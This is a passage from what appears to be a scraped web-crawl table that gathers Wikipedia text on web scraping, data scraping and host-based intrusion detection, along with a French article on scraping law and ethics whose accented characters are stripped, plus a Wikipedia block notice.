infringe someone else's personality rights. Publication of information found in Wikipedia may be in violation of the laws of the country or jurisdiction from where you are viewing this information. The Wikipedia database is stored on servers in the United States of America, and is maintained in reference to the protections afforded under local and federal law. Laws in your country or jurisdiction may not protect or allow the same kinds of speech or distribution. Wikipedia does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein. If you need specific advice (for example, medical, legal, financial, or risk management), please seek a professional who is licensed or knowledgeable in that area. |
252 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=20 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
253 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Host-based_intrusion_detection_system | A host-based intrusion detection system (HIDS) is an intrusion detection system that is capable of monitoring and analyzing the internals of a computing system as well as the network packets on its network interfaces, similar to the way a network-based intrusion detection system (NIDS) operates. 1 HIDS focuses on more granular and internal attacks through focusing monitoring host activities instead of overall network traffic. 2 HIDS was the first type of intrusion detection software to have been designed, with the original target system being the mainframe computer where outside interaction was infrequent. 3 One major issue with using HIDS is that it needs to be installed on each and every computer that needs protection from intrusions. This can lead to a slowdown in device performance and intrusion detection systems. 4 A host-based IDS is capable of monitoring all or parts of the dynamic behavior and the state of a computer system, based on how it is configured. Besides such activities as dynamically inspecting network packets targeted at this specific host (optional component with most software solutions commercially available), a HIDS might detect which program accesses what resources and discover that, for example, a word-processor has suddenly and inexplicably started modifying the system password database. Similarly a HIDS might look at the state of a system, its stored information, whether in RAM, in the file system, log files or elsewhere; and check that the contents of these appear as expected, e.g. have not been changed by intruders. 5 One can think of a HIDS as an agent that monitors whether anything or anyone, whether internal or external, has circumvented the system's security policy. In comparison to network-based intrusion detection systems, HIDS is advantageous because of its capability of identifying internal attacks. While NIDS examines data from network traffic, HIDS examines data originating from operating systems. In recent years, HIDS has been faced with the big data challenge, which can be attributed to the increased advancement of data center facilities and methodologies. 6 Many computer users have encountered tools that monitor dynamic system behavior in the form of anti-virus (AV) packages. While AV programs often also monitor system state, they do spend a lot of their time looking at who is doing what inside a computer and whether a given program should or should not have access to particular system resources. The lines become blurred here, as many of the tools overlap in functionality. Some intrusion prevention systems protect against buffer overflow attacks on system memory and can enforce security policy. 7 The principle operation of a HIDS depends on the fact that successful intruders (hackers) will generally leave a trace of their activities. In fact, such intruders often want to own the computer they have attacked, and will establish their "ownership" by installing software that will grant the intruders future access to carry out whatever activity (keystroke logging, identity theft, spamming, botnet activity, spyware-usage etc.) they envisage. In theory, a computer user has the ability to detect any such modifications, and the HIDS attempts to do just that and reports its findings. Ideally a HIDS works in conjunction with a NIDS, such that a HIDS finds anything that slips past the NIDS. Commercially available software solutions often do correlate the findings from NIDS and HIDS in order to find out about whether a network intruder has been successful or not at the targeted host. Most successful intruders, on entering a target machine, immediately apply best-practice security techniques to secure the system which they have infiltrated, leaving only their own backdoor open, so that other intruders can not take over their computers. In general a HIDS uses a database (object-database) of system objects it should monitor usually (but not necessarily) file system objects. A HIDS could also check that appropriate regions of memory have not been modified for example, the system call table for Linux, and various vtable structures in Microsoft Windows. For each object in question a HIDS will usually remember its attributes (permissions, size, modifications dates) and create a checksum of some kind (an MD5, SHA1 hash or similar) for the contents, if any. This information gets stored in a secure database for later comparison (checksum database). An alternate method to HIDS would be to provide NIDS type functionality at the network interface (NIC) level of an end-point (either server, workstation or other end device). Providing HIDS at the network layer has the advantage of providing more detailed logging of the source (IP address) of the attack and attack details, such as packet data, neither of which a dynamic behavioral monitoring approach could see. At installation time and whenever any of the monitored objects change legitimately a HIDS must initialize its checksum-database by scanning the relevant objects. Persons in charge of computer security need to control this process tightly in order to prevent intruders making un-authorized changes to the database(s). Such initialization thus generally takes a long time and involves cryptographically locking each monitored object and the checksum databases or worse. Because of this, manufacturers of HIDS usually construct the object-database in such a way that makes frequent updates to the checksum database unnecessary. Computer systems generally have many dynamic (frequently changing) objects which intruders want to modify and which a HIDS thus should monitor but their dynamic nature makes them unsuitable for the checksum technique. To overcome this problem, HIDS employ various other detection techniques: monitoring changing file-attributes, log-files that decreased in size since last checked, and numerous other means to detect unusual events. Once a system administrator has constructed a suitable object-database ideally with help and advice from the HIDS installation tools and initialized the checksum-database, the HIDS has all it requires to scan the monitored objects regularly and to report on anything that may appear to have gone wrong. Reports can take the form of logs, e-mails or similar. A HIDS will usually go to great lengths to prevent the object-database, checksum-database and its reports from any form of tampering. After all, if intruders succeed in modifying any of the objects the HIDS monitors, nothing can stop such intruders from modifying the HIDS itself unless security administrators take appropriate precautions. Many worms and viruses will try to disable anti-virus tools, for example. Apart from crypto-techniques, HIDS might allow administrators to store the databases on a CD-ROM or on other read-only memory devices (another factor in favor of infrequent updates...) or storing them in some off-system memory. Similarly, a HIDS will often send its logs off-system immediately typically using VPN channels to some central management system. One could argue that the trusted platform module comprises a type of HIDS. Although its scope differs in many ways from that of a HIDS, fundamentally it provides a means to identify whether anything anyone has tampered with a portion of a computer. Architecturally this provides the ultimate (at least at this point in time update ) host-based intrusion detection, as depends on hardware external to the CPU itself, thus making it that much harder for an intruder to corrupt its object and checksum databases. InfoWorld states that host-based intrusion-detection system software is a useful way for network managers to find malware, and suggest they run it on every server, not just critical servers. 8 |
254 | https://en.wikipedia.org/wiki/Web_scraping | https://www.scribd.com/doc/249068700/LinkedIn-v-Resultly-LLC-Complaint?secret_password=pEVKDbnvhQL52oKfdrmT | Welcome to Scribd Academic Documents Professional Documents Culture Documents Hobbies Crafts Documents Personal Growth Documents LinkedIn v. Resultly, LLC - Complaint LinkedIn v. Resultly, LLC - Complaint About Support Legal Social Get our free apps About Legal Support Social Get our free apps |
255 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#bodyContent | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
256 | https://en.wikipedia.org/wiki/Web_scraping | https://fr.wikipedia.org/wiki/Web_scraping | Cet article ne cite pas suffisamment ses sources (avril 2020). Si vous disposez d'ouvrages ou d'articles de r f rence ou si vous connaissez des sites web de qualit traitant du th me abord ici, merci de compl ter l'article en donnant les r f rences utiles sa v rifiabilit et en les liant la section Notes et r f rences . En pratique : Quelles sources sont attendues ? Comment ajouter mes sources ? Le web scraping, parfois appel harvesting ou en fran ais moissonnage 1 , est une technique de r cup ration et organisation automatis es des donn es Web ; c'est la principale forme de data mining et d'extraction des donn es de sites web, via un script ou d'un programme. Il vise capter des donn es, pour les transformer et ou les r utiliser dans un autre contexte comme l'enrichissement de bases de donn es, le r f rencement 2 ou l'exploration de donn es, ou l'apprentissage profond pour une intelligence artificielle. L'objectif est souvent commercial, mais parfois scientifique ou politique. Profitant des progr s logiciels et de la science des donn es, dans le cadre de l' conomie num rique o au sein de l' conomie de la surveillance, l'exploitation commercial et politique du big data le moissonnage du Web s'est exponentiellement g n ralis , ill galement parfois, ou en b n ficiant de flous ou vides juridiques. Les enjeux sont notamment commerciaux et politiques, mais aussi thiques, juridiques et philosophiques, car le scraping met en p ril la protection des donn es et la s curit des individus et de certains groupes. Ces enjeux deviennent critiques avec l' mergence des intelligences artificielles (g n ratives et multimodales notamment) qui permettent d'utiliser mauvais escient des donn es vol es et ou apparemment banales et sans int r t massivement scrap es sur l'Internet pour des activit s criminelles ou pour la propagande, y compris lectorale, comme l'ont montr le scandale Facebook-Cambridge Analytica AggregateIQ et la diffusion croissante de fake news cibl es. Parmi les enjeux mergents figurent l'utilisation de l'intelligence artificielle qui la fois facilite le moissonnage et permet d'en tirer beaucoup plus d'informations, y compris des informations sensibles et sur la vie priv e. Aujourd’hui, les chercheurs s'appuient de plus en plus sur l'intelligence artificielle (par exemple, l'apprentissage automatique, l'analyse des sentiments et ou l'apprentissage profond) pour extraire le sens et l’interf rence des donn es Web ) 3 . Les outils r cents de moissonnage des donn es (originelles ou dupliqu es) permettent d'extraire et collecter, puis traiter (classer, v rifier, nettoyer, agr ger et structurer) la donn e, g n ralement partir Big Web Data dont le volume cro t exponentiellement (multipli par plus de trente en 10 ans, passant de 2 zettaoctets en 2010 64 zettaoctets en 2023 4 . Cette donn e est le plus souvent directement capt e dans le code source de pages web (actuelles ou archiv es) et dans les plateformes du Web (r seaux sociaux notamment). Selon Statista, en 2020, environ 64 000 milliards de gigaoctets de donn es ont t g n r es, dont seul un petit pourcentage era conserv car la capacit de stockage mondiale n' tait "que" de 6,7 zettaoctets en 2020 (environ 6,7 milliards de gigaoctets). le volume de la donn e du Web devrait cependant d passer 180 zettaoctets vers 2025, cause du d veloppement des objets connect s et de la 5G. Avec une efficacit et une rapidit croissante (li e aux progr s de l'informatique), ces outils permettent, grande chelle, d'extraire, structurer, analyser et valuer, puis stocker et manipuler, et ventuellement commercialiser, ces donn es et des donn es d riv es (secondaires). Les bases de donn es ainsi produites peuvent inclure un grand nombre de renseignements personnels et des donn es sur toutes sortes d'entit s socio conomiques, culturelles, m diatiques, militaires, etc. Elles permettent de r aliser des profils psychologiques, sociaux et conomiques tr s pouss s de centaines de milliards de personnes, ainsi que des profils d'entreprises, d'ONG, etc. Ces donn es, anonymis es, ont d'abord t utilis es pour diverses tudes scientifiques (en pid miologie et en sociologie et anthropologie par exemple), mais dans un monde de plus en plus ax sur l' conomie de l'information, ces donn es sont maintenant devenues une ressource strat gique comparable en valeur la terre, l'or et au p trole 5 , 6 , tr s recherch es par des officines ou entreprises sp cialis es qui vendent ces donn es agr g es aux banques, aux assureurs, certains groupes politiques, des tats autoritaires et dictatures (qui les utilisent pour cibler et contr ler des citoyens et diverses entit s). Alors que les algorithmes sophistiqu s et l'intelligence artificielle peuvent ais ment d sanonymiser un grand nombre de donn es personnelles (donn es de sant y compris), le moissonnage massif et permanent des donn es du Web, par les gouvernements et par un nombre croissant de plateformes Web priv es et d'officines dont le commerce de la donn e fonde le mod le conomique soul ve de graves pr occupations thiques et politiques en mati re de protection de la vie priv e et de donn es sensibles. Parmi les d rives souvent cit es figurent l'espionnage massif des citoyens (y compris les leurs), et des concurrents conomiques par les tats-Unis, la Russie et la Chine, notamment 7 . Les syst mes am ricains d'espionnage g n ralis (mis au jour par divers lanceurs d'alerte dont Julian Assange, Chelsea Manning, Edward Snowden), les fermes de Trolls russes ou l'approche chinoise du syst me de cr dit social (SCS), le premier syst me de notation sociale mis en uvre num riquement l' chelle nationale, vise am liorer la fiabilit au sein de la soci t chinoise et constitue un exemple essentiel de la transformation num rique de la soci t Il est en outre con u pour am liorer le comportement moral, la fiabilit financi re et le contr le social 7 . Le scraping du web menace les quatre droits et tats de base de la vie priv e nonc s par Westin en 1962 (droit la solitude 8 , l'intimit , l'anonymat dans la foule et la r serve) sont menac s dans un nombre croissant de situations 9 , de m me que la protection du contenu des courriers lectroniques 10 qui fait partie du droit la vie priv e 11 . Le scrapping doit respecter la propri t commerciale et ou intellectuelle et, dans l'Union europ enne, le RGPD. Sans autorisation pr alable, il n'est autoris que pour des donn es nativement l galement publiques, ou tomb es dans le domaine public, ou pour des donn es stock es sur des sites ou plateformes sous une licence libre le permettant (certaines licences ouvertes (Creative Commons Attribution par exemple) stipulent que le droit de r utilisation et ou de transformation de la donn e ne vaut que pour les usages non commerciaux et ou que les nouvelles donn s soient galement publi es sous une licence ouverte similaire, en mentionnant l'auteur initial, la source, la licence, etc.). Il doit tenir compte des usages selon les param tres binaires suivant : Dans les m tadonn es d'un site internet, des fichiers robots.txt peuvent indiquer aux bots de scrapping les zones autoris es ou interdites au scraping. Tout viol de ces r gles peut entra ner des poursuites judiciaires et des amendes pour violation de droits d'auteur ou de la protection des donn es, et cons quemment une perte de r putation et d'e-r putation pour les entreprises ou personnes responsables d'un scrapping ill gal. Aux tats-Unis, la soci t hiQ Labs utilise le web scraping sur les donn es de LinkedIn des fins de recrutement. la suite d'un proc s, la Cour d'appel des tats-Unis pour le neuvi me circuit donne raison hiQ en septembre 2019 : la cour consid re notamment que les utilisateurs conservent la propri t de leurs profils, et que les donn es tant librement diffus es sur Internet, elles peuvent tre collect es. L'affaire est ensuite port e devant la Cour supr me 12 . En novembre 2022, la cour du district nord de Californie juge en faveur du r seau social LinkedIn sur d cision du juge Edward Chen, invoquant le fait que hiQ pratique la r tro-ing nierie afin de contourner sciemment et de mani re r p t e les protections contre les robots en simulant des utilisateurs humains 13 . Dans un jugement de 2013, la Cour de justice de l'Union europ enne condamne le m tamoteur de recherche Innoweb, qui r utilise les donn es de l'entreprise de vente d'automobiles Wegener sans modification de celles-ci 14 . Le 30 avril 2020, la Commission nationale de l'informatique et des libert s (CNIL) publie de nouvelles directives sur le web scraping 15 . Les lignes directrices de la CNIL pr cisent que les donn es accessibles au public sont toujours des donn es personnelles et qu'elles ne peuvent pas tre r utilis es l'insu de la personne laquelle ces donn es appartiennent 16 . En d cembre 2021, une start-up de la Station F est condamn e pour piratage informatique. l'aide d'une technique de web scraping, elle r colte des donn es de l'annuaire d'une cole de commerce parisienne, afin de solliciter les anciens l ves de l' tablissement en vue d'alimenter un financement participatif 17 . La condamnation porte sur la m thode d'acc s la donn e, c'est dire une usurpation d'identit permettant un acc s frauduleux un syst me de traitement automatis de donn es , et non le web scraping lui-m me. De nombreuses technologies permettent d'extraire du contenu de sites web via le web scraping. Certaines n cessitent des connaissances en d veloppement de logiciels (les frameworks et biblioth ques, ou les API par exemple) tandis que d'autres sont accessibles au grand public et peuvent tre utilis s travers une interface graphique (c'est le cas des extensions de navigateur ou des logiciels en tant que service). Il existe de multiples frameworks et biblioth ques logicielles, disponibles pour plusieurs langages de programmation, pour crire des applications de web scraping. Certains reposent sur l' mulation d'une instance d'un navigateur web afin de r aliser des actions sur des pages web (telles que cliquer sur un lien ou remplir un champ de formulaire) utiles pour r aliser des tests automatis s, ou dans le cadre du web scraping, pour extraire des donn es. On dit alors que le web scraping est r alis c t client, ce qui a pour avantage de pouvoir extraire du contenu dynamique g n r par le code JavaScript pr sent sur la page. La biblioth que Node.js Puppeteer, par exemple, mule une instance du navigateur Chromium et permet de r aliser des actions automatis es en mode headless ou non. D'autres frameworks et biblioth ques reposent sur l'analyse du code HTML de la page obtenu en r alisant une requ te HTTP. Ce code HTML n' tant dans ce cas pas interpr t par un moteur JavaScript, il n'est pas interpr t . Cela est un inconv nient dans le cadre du web scraping l' re du web moderne o le contenu des pages web est souvent g n r dynamiquement par du code JavaScript. N'ayant pas besoin d'interpr ter le JavaScript, ni de t l charger toutes les ressources de la page (les feuilles de style, images etc.) cette m thode est en revanche g n ralement bien plus conome en ressources (m moire vive, bande passante, etc.) et donc plus rapide. C'est le fonctionnement, par exemple, de la biblioth que Goutte (PHP). Les biblioth ques et frameworks les plus populaires pour le web scraping sont : L'utilisation d'interfaces de programmation est une bonne alternative aux biblioth ques et frameworks pour les d veloppeurs souhaitant acc l rer le d veloppement de leurs applications de web scraping. Ces interface de programmation (API) fonctionnent g n ralement de la fa on suivante : l'utilisateur r alise une requ te HTTP vers un point de terminaison pr sent sur un serveur distant contr l par le prestataire du service. Cette requ te porte dans sa charge utile l'adresse (URL) de la page web de laquelle il faut extraire les donn es et parfois d'autres param tres tels qu'un s lecteur CSS ou XPath permettant d'identifier un ou plusieurs l ments HTML pr cis desquels extraire le contenu. Le serveur r pond alors par le contenu demand . De nombreuses soci t s proposent des API de web scraping, g n ralement payantes, dont voici une liste non exhaustive des options les plus populaires : De tr s nombreux logiciels permettent d'automatiser le web scraping, certains n cessitant quelques connaissances en d veloppement informatique et d'autres non. On peut les classer en : Parmi les plus utilis s figurent : Peu apr s l'expansion des r seaux sociaux de l'Internet dans le monde, l'extraction de donn es partir de leurs sites est devenu un moyen courant d'obtenir des ensembles de donn es par exemple utilis es pour former des intelligences artificielles, ou pour profiler les personnes, parfois massivement, comme on l'a vu dans le cas du scandale Scandale Facebook-Cambridge Analytica AggregateIQ 19 . Parmi les parades possibles contre le scraping figurent : Le scrapeur de donn es peut de son c t son tour utiliser des parades (l'une des plus courantes tant par exemple l'entra nement contradictoire et les fortes augmentations de donn es) 25 qui vont toutefois lui demander de consommer plus de ressource en temps et en ressources informatiques. |
257 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-32 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and 